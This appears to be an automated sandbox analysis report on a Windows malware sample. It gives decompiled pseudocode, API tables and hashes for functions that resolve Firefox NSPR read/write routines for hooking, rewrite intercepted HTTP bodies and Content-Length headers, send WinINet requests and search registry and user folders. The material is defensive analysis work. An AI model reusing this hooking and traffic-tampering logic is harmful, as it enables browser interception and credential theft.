0x00405b59
0x00405b60
0x00405b6f
0x00405b10
0x00405b10
0x00405b13
0x00405b17
0x00405b1b
0x00405b1c
0x00405b21
0x00405b24
0x00405b29
0x00405b2a
0x00405b2c
0x00405b31
0x00405b33
0x00000000
0x00000000
0x00405b33
0x00405b13
0x00405b0e
0x00405b09
0x00405b77
0x00405b7c
0x00405b7e
0x00000000
0x00000000
0x00000000
0x00405a8c
0x00405a7e
0x00405a7e
0x00405a80
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a80
0x00405a7c
0x00405a76
0x00405a6d
0x00405a64
0x00405b83
0x00000000
0x00405b83
0x00405956
0x00405958
0x00405962
0x00405973
0x00000000
0x00405979
0x00405979
0x0040597b
0x0040597e
0x00405981
0x00000000
0x00405987
0x00405987
0x00405987
0x0040598d
0x00000000
0x00000000
0x00405997
0x00000000
0x0040599d
0x0040599d
0x004059a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004059a0
0x00000000
0x00405997
0x004059a4
0x00000000
0x004059b2
0x004059bd
0x004059c1
0x00000000
0x004059c7
0x004059cc
0x004059d1
0x004059df
0x004059e3
0x004059fb
0x004059fb
0x004059fe
0x00405a03
0x00405a16
0x00405a1b
0x00405a05
0x00405a09
0x00405a0e
0x00405a0e
0x00405a21
0x004059e5
0x004059ed
0x004059f1
0x00000000
0x004059f3
0x004059f4
0x004059f4
0x004059f1
0x00405a23
0x00405a27
0x00405a2c
0x00405a32
0x00405a32
0x004059c1
0x004059a4
0x00405981
0x00000000
0x00000000
0x00000000
0x00405962
0x00405950
0x00405b8c
0x00405b92

APIs

EnterCriticalSection.KERNEL32(0041E46C,0000FDE9,?), ref: 004059D1
LeaveCriticalSection.KERNEL32(0041E46C,?,000000FF), ref: 00405A2C
EnterCriticalSection.KERNEL32(0041E46C), ref: 00405A47
getpeername.WS2_32 ref: 00405AF4

Strings

W, xrefs: 00405A82
D, xrefs: 00405A88
, xrefs: 0040596F
U, xrefs: 004059FB

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $D$U$W
API String ID: 1099368488-576695944
Opcode ID: 76718a06efdcb1592042b49ff1d6bf360cf32fa7fa6e1b7dfb04c82cf0b6f87a
Instruction ID: 613b8555dc056e80d60bd9ef7ddf7f70cddc72d05eeac635999db45cf45a7b78
Opcode Fuzzy Hash: 76718a06efdcb1592042b49ff1d6bf360cf32fa7fa6e1b7dfb04c82cf0b6f87a
Instruction Fuzzy Hash: 51513831A00B019EDF30AA658885BAB77A4DB41720F14463BED54B72E1D77CAC85CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404CFC, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00404CFC(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t29;
				_Unknown_base(*)()* _t41;
				intOrPtr _t43;
				signed char _t49;
				signed char _t50;
				signed char _t51;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				signed char* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;

				_t58 = __ecx;
				_t66 =  &_v112;
				E0040CA33(0xdd, _t66);
				_t29 = LoadLibraryW(_t66);
				_v8 = _t29;
				if(_t29 != 0) {
					_t61 =  &_v84;
					E0040C9FD(0xde, _t61);
					_t55 = GetProcAddress(_v8, _t61);
					_t62 =  &_v40;
					E0040C9FD(0xdf, _t62);
					_v20 = GetProcAddress(_v8, _t62);
					_t63 =  &_v60;
					E0040C9FD(0xe0, _t63);
					_t41 = GetProcAddress(_v8, _t63);
					_t68 = 0;
					_t64 = _t41;
					if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
						L17:
						return FreeLibrary(_v8);
					} else {
						_t43 = E004127D2(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t43;
						if(_t43 != 0xffffffff) {
							E00404C8B(_t58, 0, _t64, _t43, _a4, _a8);
						}
						_push( &_v12);
						_push( &_v16);
						_push(1);
						_push(_t68);
						_push(_t68);
						if( *_t55() == 0) {
							goto L17;
						} else {
							_t57 = 0;
							if(_v12 <= _t68) {
								L16:
								_v20(_v16);
								goto L17;
							} else {
								goto L8;
							}
							do {
								L8:
								_t59 = _t68 + _v16;
								_t19 =  &(_t59[8]); // 0x0
								_t49 =  *_t19;
								if(_t49 == 0 || _t49 == 4) {
									_t50 =  *_t59;
									if(_t50 == _v24) {
										goto L14;
									}
									_push(_a8);
									_t51 = _t50 | 0x000000ff;
									if(_t51 != 0) {
										goto L15;
									}
									_push(_t51);
									_push(_t64);
									E00404C8B(_t59, _t68);
									goto L14;
								} else {
									L14:
									_t57 = _t57 + 1;
								}
								L15:
								_t68 = _t68 + 0xc;
							} while (_t57 < _v12);
							goto L16;
						}
					}
				}
				return _t29;
			}

0x00404cfc
0x00404d03
0x00404d0b
0x00404d13
0x00404d19
0x00404d1e
0x00404d26
0x00404d2e
0x00404d41
0x00404d43
0x00404d4b
0x00404d58
0x00404d5b
0x00404d63
0x00404d6e
0x00404d70
0x00404d72
0x00404d76
0x00404df4
0x00000000
0x00404d81
0x00404d86
0x00404d8b
0x00404d91
0x00404d97
0x00404da1
0x00404da1
0x00404da9
0x00404dad
0x00404dae
0x00404db0
0x00404db1
0x00404db6
0x00000000
0x00404db8
0x00404db8
0x00404dbd
0x00404dee
0x00404df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dbf
0x00404dbf
0x00404dc2
0x00404dc5
0x00404dc5
0x00404dca
0x00404dd1
0x00404dd6
0x00000000
0x00000000
0x00404dd8
0x00404dda
0x00404ddc
0x00000000
0x00000000
0x00404dde
0x00404ddf
0x00404de0
0x00000000
0x00404de5
0x00404de5
0x00404de5
0x00404de5
0x00404de6
0x00404de6
0x00404de9
0x00000000
0x00404dbf
0x00404db6
0x00404d76
0x00404e01

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00405692,?,?), ref: 00404D13
GetProcAddress.KERNEL32(?,?), ref: 00404D3F
GetProcAddress.KERNEL32(?,?), ref: 00404D56
GetProcAddress.KERNEL32(?,?), ref: 00404D6E
FreeLibrary.KERNEL32(?), ref: 00404DF7

Part of subcall function 004127D2: GetCurrentThread.KERNEL32 ref: 004127E2
Part of subcall function 004127D2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
Part of subcall function 004127D2: OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00405692,?,?,00000000), ref: 00404D8B

Part of subcall function 00404C8B: EqualSid.ADVAPI32(00000000,0000000C,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CB0
Part of subcall function 00404C8B: CloseHandle.KERNEL32(?,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CF1

Strings

SeTcbPrivilege, xrefs: 00404D81
.exe, xrefs: 00404D25

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 36611e2bc1cce1dc6af0e9181e778d97d2cc0a1f2ffdfb95400c44fe3566c085
Instruction ID: 231b8748e2783aa9f331c36a96346574f88f4befcfe14207610f6bee849b305b
Opcode Fuzzy Hash: 36611e2bc1cce1dc6af0e9181e778d97d2cc0a1f2ffdfb95400c44fe3566c085
Instruction Fuzzy Hash: FB316EB5A00218ABDF21ABA5CC849EF7B79EF84314B14017AF911F6290C6749E41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00412DEE, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00412DEE(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x41e000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x00412df5
0x00412df9
0x00412dfe
0x00412e00
0x00412e00
0x00412e09
0x00412e0b
0x00412e0b
0x00412e14
0x00412e19
0x00412e1b
0x00412e1b
0x00412e3c
0x00412e40
0x00412ea0
0x00000000
0x00412e42
0x00412e44
0x00412e4c
0x00412e4e
0x00412e53
0x00412e46
0x00412e46
0x00412e48
0x00412e65
0x00412e99
0x00412e9a
0x00000000
0x00412e67
0x00412e67
0x00412e7b
0x00412e8a
0x00000000
0x00412e95
0x00000000
0x00412e95
0x00412e8a
0x00412e65

APIs

HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,0041E000,8404F700,00000000), ref: 00412E36
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00412E5D
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00412E82
InternetCloseHandle.WININET(00000000), ref: 00412E9A

Strings

GET, xrefs: 00412E1B, 00412E32
HTTP/1.1, xrefs: 00412E2A
POST, xrefs: 00412E14
Connection: close, xrefs: 00412E4E, 00412E5B

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 67e7a7ea8234f1c65cc63a820131d1aa8ab9f65b6763e73ab6c503d54146cafd
Instruction ID: d71f00b97df3dc17c31419508aed9241af78fafd4180e64e744a4f9f4b88ddfd
Opcode Fuzzy Hash: 67e7a7ea8234f1c65cc63a820131d1aa8ab9f65b6763e73ab6c503d54146cafd
Instruction Fuzzy Hash: 2D11637120031A6BEB218E50DE45FEB3A9CEB18755F144026FE05E92A1D7F8DDA087EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF97, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040EF97(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x41e340 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x41e350 = GetProcAddress(__edi, "PR_Close");
				 *0x41e360 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x41e340);
				_t9 = 4;
				 *0x41e370 = _t4;
				_t10 = E0040ECE3(_t9, _t11, _t12);
				if(_t10 != 0) {
					E00418CBA(__edi,  *0x41e348,  *0x41e358,  *0x41e368,  *0x41e378);
				}
				return _t10;
			}

0x0040ef97
0x0040ef97
0x0040efad
0x0040efba
0x0040efc7
0x0040efcc
0x0040efce
0x0040efd5
0x0040efd6
0x0040efe0
0x0040efe4
0x0040f000
0x0040f000
0x0040f009

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0040EFA5
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040EFB2
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040EFBF
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040EFCC

Part of subcall function 0040ECE3: VirtualAllocEx.KERNEL32(000000FF,00000000,00000032,00003000,00000040,00000000,77E49EB0,?,?,0040EF95,0041E020,00000000,0040652B), ref: 0040ED1A

Part of subcall function 00418CBA: InitializeCriticalSection.KERNEL32(0042001C,74B04EE0,0040F005,0041E340), ref: 00418CD0
Part of subcall function 00418CBA: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00418D0C
Part of subcall function 00418CBA: GetProcAddress.KERNEL32(PR_SetError), ref: 00418D1E
Part of subcall function 00418CBA: GetProcAddress.KERNEL32(PR_GetError), ref: 00418D30

Strings

PR_OpenTCPSocket, xrefs: 0040EF9F
PR_Write, xrefs: 0040EFC1
PR_Close, xrefs: 0040EFA7
PR_Read, xrefs: 0040EFB4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 9236722ac28c13b2768b8baccb18989ec6878439a75640a24a6272b099f0bf19
Instruction ID: f6857b5433f0791e2361d280183f3b496adb83067569724a36efaa8e8a65353c
Opcode Fuzzy Hash: 9236722ac28c13b2768b8baccb18989ec6878439a75640a24a6272b099f0bf19
Instruction Fuzzy Hash: 08F0B4B9F41318AAD6202BB7AC05EC2BF68BB85B10308543BBD20A32B0D7B90040DE5C

Uniqueness

Uniqueness Score: -1.00%

Function 004194A9, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004194A9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;

				_t99 = E00406B23();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x420040(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x42001c;
					EnterCriticalSection(0x42001c);
					_t101 = E00418847(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x420038;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4325388
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E00411142(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E004111B9(E00411106( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x42001c);
					_t107 =  *0x420040(_t179, _a8, _a12);
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x42001c);
					_t108 = E00418847(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x420018();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x420038;
						_v36 = _t176;
						if(_t168 > 0) {
							E00411142( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E004190CD(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E00419277( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00408A1C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E004110D6( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E00411142(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
										_push(_t155);
										if((_v32 & 0x00000002) == 0) {
											E004118AF( &_v32);
											_t188 = E00415E63(_t186, _v16, "Content-Length",  &_v36) + _v60;
											E00411142(_t188, _v68, _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00411E3D(_t131, _t177, _t191);
											E00411142(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E00411142(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E00411142(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
										}
										E00411106( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E00411106(_v48);
							}
							_t153 = 0x42001c;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E00408EE0( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x420038;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4325412
					if(E00411091( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x004194b5
0x004194ba
0x004194bf
0x004197ac
0x004197b3
0x00000000
0x004194d9
0x004194df
0x004194e5
0x004194e7
0x004194ef
0x004197a5
0x004197a6
0x00000000
0x004197a6
0x004194f8
0x00419502
0x0041973e
0x00419741
0x00419744
0x00419744
0x00419747
0x0041974c
0x00419758
0x0041975d
0x00419763
0x00419766
0x00419774
0x00419774
0x0041977a
0x00419780
0x004197bc
0x004197c2
0x004197c2
0x0041950c
0x00000000
0x00000000
0x00419513
0x00419520
0x00419529
0x00419530
0x0041979f
0x0041979f
0x00000000
0x0041979f
0x00419537
0x00419539
0x0041953e
0x00419543
0x00419784
0x00419784
0x00419786
0x0041978b
0x0041978b
0x00419791
0x00419798
0x00419799
0x00000000
0x00419799
0x00419549
0x0041954f
0x00419573
0x00419576
0x0041957c
0x00419582
0x0041958f
0x00419594
0x00419594
0x004195a1
0x004195a6
0x004195ad
0x004195d1
0x004195d6
0x004195dd
0x004195fd
0x0041960a
0x0041961b
0x0041961d
0x00419623
0x00419632
0x0041963c
0x0041963d
0x00419679
0x00419699
0x0041969e
0x004196a3
0x004196a3
0x0041963f
0x0041963f
0x00419646
0x00419648
0x00419655
0x00419658
0x00419664
0x00419667
0x0041966c
0x00419670
0x00419670
0x004196a5
0x004196ac
0x004196c1
0x004196c1
0x004196c6
0x004196cb
0x004196d1
0x004196d4
0x004196d4
0x00419623
0x004196db
0x004196e0
0x004196e0
0x004196e5
0x004196e5
0x004196f0
0x00419707
0x00419707
0x00419714
0x0041971a
0x00419720
0x00419726
0x00419729
0x0041972c
0x0041972f
0x00419734
0x00419738
0x0041973b
0x00000000
0x0041973b
0x00419709
0x0041970e
0x00000000
0x00000000
0x00000000
0x004196f2
0x004196f6
0x00419703
0x00000000
0x00419703
0x004196f8
0x004196f9
0x00000000
0x004196f9
0x004196f0
0x00419554
0x0041955d
0x0041955f
0x00419569
0x00000000
0x00000000
0x0041956f
0x00000000
0x0041956f

APIs

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

EnterCriticalSection.KERNEL32(0042001C), ref: 004194E5
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419513
EnterCriticalSection.KERNEL32(0042001C), ref: 00419537
LeaveCriticalSection.KERNEL32(0042001C,00000000,?,00000000), ref: 0041977A
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419799

Part of subcall function 00415E63: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 00415EBD

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

LeaveCriticalSection.KERNEL32(0042001C), ref: 004197A6

Strings

%x, xrefs: 0041963F
0, xrefs: 0041965F
Content-Length, xrefs: 00419683

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 4dafdf7f57132eae2b36af7c979d67754611cb37984c35f1f997dfac44d7bfc0
Instruction ID: d6463938f9ff925452ade55891b6b4f0f0f21b2fa9480056286d419b04fd3d3f
Opcode Fuzzy Hash: 4dafdf7f57132eae2b36af7c979d67754611cb37984c35f1f997dfac44d7bfc0
Instruction Fuzzy Hash: 4B91BE72900211EFCB10DF24D841E9ABBB4FF84314F04061AF964976A2D738ED95CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADD9, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040ADD9(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E004111B9( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E0040CA33(_t46,  &_v252);
				_t48 = 0x6b;
				E0040CA33(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E004150D3(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E0040ABED(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E0040CA33(_t57,  &_v64);
					_t59 = 0x6e;
					E0040CA33(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E0040CA33(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E0040ABAB(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E004165E9( &_v772,  &_v24, 0, 3, 2, E0040AD90,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E00411106(_v12);
						}
						_push(0xcb);
						return E004095BC(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E0040CA33(_t68,  &_v180);
					_t70 = 0x6c;
					E0040CA33(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E004150D3(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E0040ABAB(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x0040add9
0x0040add9
0x0040aded
0x0040adfa
0x0040adfb
0x0040ae05
0x0040ae06
0x0040ae1b
0x0040ae26
0x0040ae2e
0x0040ae30
0x0040ae32
0x0040ae3f
0x0040ae50
0x0040ae5c
0x0040ae5c
0x0040ae32
0x0040ae62
0x0040ae67
0x0040af87
0x0040af87
0x00000000
0x0040ae6d
0x0040ae72
0x0040ae73
0x0040ae80
0x0040ae81
0x0040ae88
0x0040ae8b
0x0040ae8c
0x0040ae94
0x0040ae9d
0x0040aea2
0x0040aea9
0x0040aeb0
0x0040aeb7
0x0040aebe
0x0040aec1
0x0040aec1
0x0040aed2
0x0040aeda
0x0040aedc
0x0040aedf
0x0040aeed
0x0040aef4
0x0040aef4
0x0040af0d
0x0040af10
0x0040af16
0x0040af16
0x0040af1b
0x0040af1c
0x0040af25
0x0040af8b
0x0040af8b
0x00000000
0x0040afa2
0x0040af90
0x00000000
0x0040af98
0x0040af2f
0x0040af30
0x0040af3a
0x0040af3b
0x0040af4b
0x0040af56
0x0040af5e
0x0040af60
0x0040af62
0x0040af6f
0x0040af82
0x0040af82
0x0040af62
0x00000000
0x0040af5e

APIs

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AE3F

Part of subcall function 0040ABED: GetPrivateProfileStringW.KERNEL32 ref: 0040AC24
